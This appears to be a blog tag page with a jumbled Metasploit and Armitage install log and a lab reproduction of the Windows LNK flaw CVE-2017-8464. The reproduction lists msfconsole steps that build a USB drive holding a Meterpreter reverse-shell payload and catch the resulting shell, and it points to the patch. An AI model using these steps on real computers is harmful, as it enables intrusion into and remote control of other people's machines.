Tag (metasploit)'s result:


apt-get install somelibs apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev zlib1g-dev apt-get install libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby1.9.3 ruby-dev apt-get install svn apt-get install nmap apt-get install rvm apt-get install libpq-dev apt-get install build-essential patch ruby-dev zlib1g-dev liblzma-dev apt-get install openssl ruby-openssl libssl-dev rbenv install 2.6.2 rbenv global 2.6.2   su postgres createuser msf -P -S -R -D createdb -O msf msf   git clone git://github.com/sstephenson/rbenv.git .rbenv echo ‘export PATH=”$HOME/.rbenv/bin:$PATH”‘ >> ~/.bashrc echo ‘eval “$(rbenv init -)”‘ >> ~/.bashrc git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build echo ‘export PATH=”$HOME/.rbenv/plugins/ruby-build/bin:$PATH”‘ >> ~/.bashrc git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo   git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework/ rvm –default use ruby-2.1.6@metasploit-framework cd metasploit-framework/ bash -c ‘for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done’ vim /opt/metasploit-framework/config/database.yml sh -c “echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile”   curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz tar -xvzf /tmp/armitage.tgz -C /opt ln -s /opt/armitage/armitage /usr/local/bin/armitage ln -s /opt/armitage/teamserver /usr/local/bin/teamserver sh -c “echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage” perl -pi -e……

stuxnet repeat(cve-2017-8464)

0x01 Overview In June 2017,Microsoft posted a patch for cve-2017-8464,this bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka “LNK Remote Code Execution Vulnerability.”. It like stuxnet,so some people call it the three generations of stuxnet.In this article,I will repeat cve-2017-8464. 0x02 The effects of range Windows 7 SP1 Windows 8 Windows 8.1 Windows RT 8.1 Windows 10 Gold, 1511, 1607, 1703 Windows Server 2008 SP2 and R2 SP1 Windows Server 2012 Gold and R2 Windows Server 2016 0x03 Trigger conditions 1.Open automatically play(It worked!) 2.Browse the catalog(It worked! 3.Access the file directory through a network share(I did not test this) 0x04 Bug repeat Environment: Drone: win7(32bit) Attacker: kali Tools: MSF,u disk Step 1: Download the last metasploit,then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat. And copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits. Step 2: msfconsole use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your ip exploit Step 3: cp /root/.msf4/local/ /root/cve-2017-8464-lnk Step 4: cp the all 24 files to the root folder of the target USB drive Step 5: use multi/handler set paylaod windows/meterpreter/reverse_tcp set LHOST your ip run Step 6: insert your usb to target computer,then you will get a reverse shell. PS: the .cpl file must in  the root folder of the target USB drive! 0x05 Repair Get the patch from MS: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464 0x06 Conclusion I think this bug is so cool,it like stuxnet,powful and easy to use,so get the patch as fast as possible. 0x07 Reference 1.https://cve.mitre.org/data/downloads/allitems-cvrf-year-2017.xml 2.http://www.4hou.com/system/6938.html 3.http://www.freebuf.com/news/143356.html